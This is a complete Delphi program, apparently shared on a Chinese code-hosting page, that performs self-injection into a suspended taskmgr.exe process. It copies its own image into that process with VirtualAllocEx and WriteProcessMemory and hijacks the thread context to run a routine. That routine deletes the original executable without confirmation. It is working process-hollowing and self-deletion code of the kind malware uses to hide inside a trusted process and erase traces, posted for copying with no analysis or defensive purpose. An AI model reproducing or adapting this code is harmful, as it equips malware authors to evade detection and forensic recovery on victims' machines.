📄 project2.dpr
字号:
program SelfInjectCode;
{小零弟弟的东西,转贴标明版权......}
uses
Windows,shellapi;
var
vbuf: array[0..MAX_PATH] of Char;
Procedure WinMain(); stdcall;
var
FileDir:string;
FileStruct:TSHFileOpStruct;
//buf: array[0..MAX_PATH] of Char;
begin
//GetCurrentDirectory(SizeOf(buf), buf);
LoadLibrary('shell32.dll');
sleep(1000);
FileDir:=vbuf;
FileStruct.Wnd:=0;
FileStruct.wFunc:=FO_delete;
FileStruct.pFrom:=Pchar(FileDir+#0);
FileStruct.fFlags:=FOF_NOCONFIRMATION;
SHFileOperation(FileStruct);
//MessageBox(0,vbuf,'By Anskya&', 0);
ExitProcess(0);
end;
var
St: TStartupInfo;
Pr: TProcessInformation;
InjectSize: dword;
Code: pointer;
Injected: pointer;
BytesWritten: dword;
Context: _CONTEXT;
const
injectprocess='taskmgr.exe';
begin
GetModuleFileName(0, vbuf, Length(vbuf));
ZeroMemory(@St, SizeOf(TStartupInfo));
St.cb := SizeOf(TStartupInfo);
St.wShowWindow := SW_SHOW;
if CreateProcess(nil, injectprocess, nil, nil, false, Create_SUSPENDED, nil, nil, St, Pr) then
begin
Code := pointer(GetModuleHandle(nil));
InjectSize := PImageOptionalHeader(pointer(integer(Code) + PImageDosHeader(Code)._lfanew +
SizeOf(dword) + SizeOf(TImageFileHeader))).SizeOfImage;
Injected := VirtualAllocEx(Pr.hProcess, Code, InjectSize, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(Pr.hProcess, Injected, Code, InjectSize, BytesWritten);
Context.ContextFlags := CONTEXT_FULL;
GetThreadContext(Pr.hThread, Context);
Context.Eip := dword(@WinMain);
SetThreadContext(Pr.hThread, Context);
ResumeThread(Pr.hThread);
end;
end.
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -